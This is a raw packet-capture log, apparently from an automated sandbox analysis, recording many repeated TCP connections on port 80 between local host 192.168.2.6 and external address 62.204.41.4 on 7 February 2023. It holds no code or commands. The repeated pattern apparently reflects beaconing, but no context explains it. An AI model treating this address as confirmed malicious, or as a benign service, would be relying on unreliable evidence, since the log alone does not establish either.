                          Feb 7, 2023 20:03:13.344511986 CET5022480192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:13.402786016 CET805022362.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:13.402988911 CET5022380192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:13.407219887 CET805022462.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:13.407433033 CET5022480192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:13.408042908 CET5022480192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:13.470654011 CET805022462.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:13.472860098 CET805022462.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:13.473062992 CET5022480192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:13.575633049 CET5022480192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:13.579648972 CET5022580192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:13.638557911 CET805022462.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:13.638644934 CET5022480192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:13.640187025 CET805022562.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:13.640314102 CET5022580192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:13.640810013 CET5022580192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:13.701328039 CET805022562.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:13.704272985 CET805022562.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:13.704473019 CET5022580192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:13.810795069 CET5022580192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:13.811945915 CET5022680192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:13.871407986 CET805022562.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:13.871675014 CET5022580192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:13.873377085 CET805022662.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:13.873613119 CET5022680192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:13.874521971 CET5022680192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:13.935967922 CET805022662.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:13.938580036 CET805022662.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:13.938724041 CET5022680192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:14.044851065 CET5022680192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:14.045996904 CET5022780192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:14.105550051 CET805022762.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:14.105835915 CET5022780192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:14.106486082 CET805022662.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:14.106585979 CET5022680192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:14.108352900 CET5022780192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:14.167612076 CET805022762.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:14.171869040 CET805022762.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:14.172010899 CET5022780192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:14.285525084 CET5022780192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:14.286189079 CET5022880192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:14.345120907 CET805022762.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:14.345304012 CET5022780192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:14.349214077 CET805022862.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:14.349379063 CET5022880192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:14.349981070 CET5022880192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:14.412589073 CET805022862.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:14.415443897 CET805022862.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:14.415591002 CET5022880192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:14.528901100 CET5022880192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:14.532545090 CET5022980192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:14.592029095 CET805022862.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:14.592255116 CET5022880192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:14.592786074 CET805022962.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:14.593039989 CET5022980192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:14.593388081 CET5022980192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:14.652695894 CET805022962.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:14.655284882 CET805022962.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:14.655447006 CET5022980192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:14.813479900 CET5022980192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:14.814359903 CET5023080192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:14.872910976 CET805022962.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:14.873028994 CET5022980192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:14.874886990 CET805023062.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:14.875001907 CET5023080192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:14.875718117 CET5023080192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:14.936594009 CET805023062.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:14.938288927 CET805023062.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:14.938427925 CET5023080192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:15.045835018 CET5023080192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:15.046463966 CET5023180192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:15.106349945 CET805023062.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:15.106446028 CET5023080192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:15.107003927 CET805023162.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:15.107137918 CET5023180192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:15.107613087 CET5023180192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:15.168071032 CET805023162.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:15.171725035 CET805023162.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:15.171858072 CET5023180192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:15.278099060 CET5023180192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:15.278841972 CET5023280192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:15.339380026 CET805023162.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:15.339430094 CET805023262.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:15.339488029 CET5023180192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:15.339559078 CET5023280192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:15.344050884 CET5023280192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:15.405179024 CET805023262.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:15.407577991 CET805023262.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:15.407702923 CET5023280192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:15.513501883 CET5023280192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:15.514377117 CET5023380192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:15.575059891 CET805023262.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:15.575252056 CET5023280192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:15.576828957 CET805023362.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:15.577063084 CET5023380192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:15.578131914 CET5023380192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:15.640671015 CET805023362.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:15.644202948 CET805023362.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:15.645406961 CET5023380192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:15.762865067 CET5023380192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:15.763667107 CET5023480192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:15.825282097 CET805023462.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:15.825344086 CET805023362.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:15.825505972 CET5023480192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:15.825527906 CET5023380192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:15.828144073 CET5023480192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:15.889554024 CET805023462.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:15.892023087 CET805023462.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:15.892184973 CET5023480192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:16.002418995 CET5023480192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:16.003601074 CET5023580192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:16.063939095 CET805023462.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:16.064038992 CET5023480192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:16.065078974 CET805023562.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:16.065618992 CET5023580192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:16.065618992 CET5023580192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:16.127185106 CET805023562.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:16.132009029 CET805023562.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:16.132128000 CET5023580192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:16.260565042 CET5023680192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:16.260647058 CET5023580192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:16.322825909 CET805023562.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:16.323167086 CET5023580192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:16.323623896 CET805023662.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:16.323959112 CET5023680192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:16.324345112 CET5023680192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:16.386845112 CET805023662.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:16.389148951 CET805023662.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:16.390044928 CET5023680192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:16.498814106 CET5023680192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:16.500463963 CET5023780192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:16.561464071 CET805023662.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:16.562647104 CET805023762.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:16.562832117 CET5023680192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:16.562892914 CET5023780192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:16.563327074 CET5023780192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:16.625720978 CET805023762.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:16.627619982 CET805023762.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:16.630831957 CET5023780192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:16.748223066 CET5023780192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:16.749186039 CET5023880192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:16.810569048 CET805023762.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:16.810725927 CET5023780192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:16.811218977 CET805023862.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:16.811459064 CET5023880192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:16.812391996 CET5023880192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:16.874182940 CET805023862.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:16.876820087 CET805023862.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:16.882879972 CET5023880192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:16.989542007 CET5023880192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:16.989624023 CET5023980192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:17.050405025 CET805023962.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:17.050771952 CET5023980192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:17.051311016 CET5023980192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:17.051398039 CET805023862.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:17.051520109 CET5023880192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:17.111928940 CET805023962.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:17.116439104 CET805023962.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:17.118140936 CET5023980192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:17.232645035 CET5023980192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:17.233719110 CET5024080192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:17.293391943 CET805023962.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:17.293584108 CET5023980192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:17.295073986 CET805024062.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:17.295238018 CET5024080192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:17.295969963 CET5024080192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:17.357280970 CET805024062.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:17.359875917 CET805024062.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:17.360045910 CET5024080192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:17.468915939 CET5024080192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:17.473412037 CET5024180192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:17.530570984 CET805024062.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:17.530699015 CET5024080192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:17.534648895 CET805024162.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:17.534820080 CET5024180192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:17.535341024 CET5024180192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:17.596528053 CET805024162.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:17.598932981 CET805024162.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:17.599044085 CET5024180192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:17.700726032 CET5024180192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:17.701539993 CET5024280192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:17.762017965 CET805024262.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:17.762054920 CET805024162.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:17.762276888 CET5024180192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:17.762294054 CET5024280192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:17.764358997 CET5024280192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:17.824923992 CET805024262.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:17.827296972 CET805024262.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:17.827466965 CET5024280192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:17.935622931 CET5024280192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:17.936590910 CET5024380192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:17.996504068 CET805024262.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:17.996681929 CET5024280192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:17.999020100 CET805024362.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:17.999526024 CET5024380192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:17.999929905 CET5024380192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:18.062412024 CET805024362.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:18.065951109 CET805024362.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:18.066170931 CET5024380192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:18.171458960 CET5024380192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:18.172236919 CET5024480192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:18.232764006 CET805024462.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:18.232948065 CET5024480192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:18.233908892 CET805024362.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:18.234015942 CET5024380192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:18.251405001 CET5024480192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:18.312041998 CET805024462.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:18.314459085 CET805024462.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:18.314949036 CET5024480192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:18.420353889 CET5024480192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:18.421705008 CET5024580192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:18.480963945 CET805024462.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:18.481148958 CET5024480192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:18.483192921 CET805024562.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:18.483382940 CET5024580192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:18.483828068 CET5024580192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:18.545236111 CET805024562.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:18.548212051 CET805024562.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:18.548408031 CET5024580192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:18.657334089 CET5024580192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:18.658564091 CET5024680192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:18.719891071 CET805024562.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:18.720051050 CET5024580192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:18.720303059 CET805024662.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:18.721407890 CET5024680192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:18.721407890 CET5024680192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:18.783056021 CET805024662.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:18.785443068 CET805024662.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:18.786398888 CET5024680192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:18.917481899 CET5024780192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:18.917532921 CET5024680192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:18.979144096 CET805024762.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:18.979176998 CET805024662.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:18.979312897 CET5024780192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:18.979917049 CET5024780192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:18.979980946 CET5024680192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:19.041315079 CET805024762.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:19.043632984 CET805024762.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:19.043797016 CET5024780192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:19.154772997 CET5024780192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:19.161798954 CET5024880192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:19.216232061 CET805024762.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:19.216407061 CET5024780192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:19.222291946 CET805024862.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:19.222449064 CET5024880192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:19.236085892 CET5024880192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:19.296571970 CET805024862.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:19.300606012 CET805024862.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:19.300789118 CET5024880192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:19.422177076 CET5024880192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:19.423388004 CET5024980192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:19.482724905 CET805024862.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:19.482867956 CET5024880192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:19.484899998 CET805024962.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:19.485127926 CET5024980192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:19.487023115 CET5024980192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:19.549319983 CET805024962.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:19.551383018 CET805024962.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:19.551609993 CET5024980192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:19.689904928 CET5024980192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:19.691056013 CET5025080192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:19.751756907 CET805024962.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:19.751993895 CET5024980192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:19.753762007 CET805025062.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:19.753936052 CET5025080192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:19.754499912 CET5025080192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:19.817192078 CET805025062.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:19.820547104 CET805025062.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:19.820667982 CET5025080192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:19.943315029 CET5025080192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:19.944390059 CET5025180192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:20.006110907 CET805025062.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:20.006263971 CET5025080192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:20.006623030 CET805025162.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:20.006751060 CET5025180192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:20.007203102 CET5025180192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:20.069371939 CET805025162.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:20.073108912 CET805025162.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:20.073193073 CET5025180192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:20.186244965 CET5025180192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:20.187061071 CET5025280192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:20.247559071 CET805025262.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:20.247698069 CET5025280192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:20.248559952 CET805025162.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:20.248701096 CET5025180192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:20.248979092 CET5025280192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:20.309524059 CET805025262.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:20.311841965 CET805025262.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:20.311975956 CET5025280192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:20.450428009 CET5025280192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:20.451488972 CET5025380192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:20.511121035 CET805025262.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:20.511337042 CET5025280192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:20.512697935 CET805025362.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:20.512829065 CET5025380192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:20.519824982 CET5025380192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:20.581166983 CET805025362.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:20.583318949 CET805025362.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:20.583422899 CET5025380192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:20.686898947 CET5025380192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:20.688206911 CET5025480192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:20.748400927 CET805025362.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:20.748496056 CET5025380192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:20.749619961 CET805025462.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:20.749716997 CET5025480192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:20.750307083 CET5025480192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:20.811750889 CET805025462.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:20.814074993 CET805025462.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:20.814219952 CET5025480192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:20.920433044 CET5025480192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:20.921484947 CET5025580192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:20.982249022 CET805025462.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:20.982481003 CET5025480192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:20.982826948 CET805025562.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:20.982991934 CET5025580192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:20.983532906 CET5025580192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:21.045059919 CET805025562.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:21.049305916 CET805025562.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:21.049546957 CET5025580192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:21.155206919 CET5025580192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:21.156316042 CET5025680192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:21.216907024 CET805025562.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:21.217103004 CET5025580192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:21.218521118 CET805025662.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:21.218719006 CET5025680192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:21.219152927 CET5025680192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:21.280504942 CET805025662.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:21.283005953 CET805025662.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:21.283195972 CET5025680192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:21.393191099 CET5025680192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:21.398225069 CET5025780192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:21.454777002 CET805025662.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:21.454883099 CET5025680192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:21.460561991 CET805025762.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:21.460743904 CET5025780192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:21.461330891 CET5025780192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:21.523611069 CET805025762.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:21.526721954 CET805025762.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:21.526930094 CET5025780192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:21.793298960 CET5025780192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:21.844455004 CET5025880192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:21.855731964 CET805025762.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:21.855942965 CET5025780192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:21.906481028 CET805025862.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:21.906789064 CET5025880192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:21.947679043 CET5025880192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:22.009231091 CET805025862.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:22.011472940 CET805025862.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:22.011641026 CET5025880192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:22.158493042 CET5025880192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:22.159322023 CET5025980192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:22.219786882 CET805025962.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:22.219888926 CET805025862.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:22.220046997 CET5025980192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:22.220128059 CET5025880192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:22.267663002 CET5025980192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:22.328531981 CET805025962.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:22.332771063 CET805025962.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:22.332978010 CET5025980192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:22.496253014 CET5025980192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:22.497457981 CET5026080192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:22.556886911 CET805025962.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:22.557121992 CET5025980192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:22.559757948 CET805026062.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:22.559941053 CET5026080192.168.2.662.204.41.4
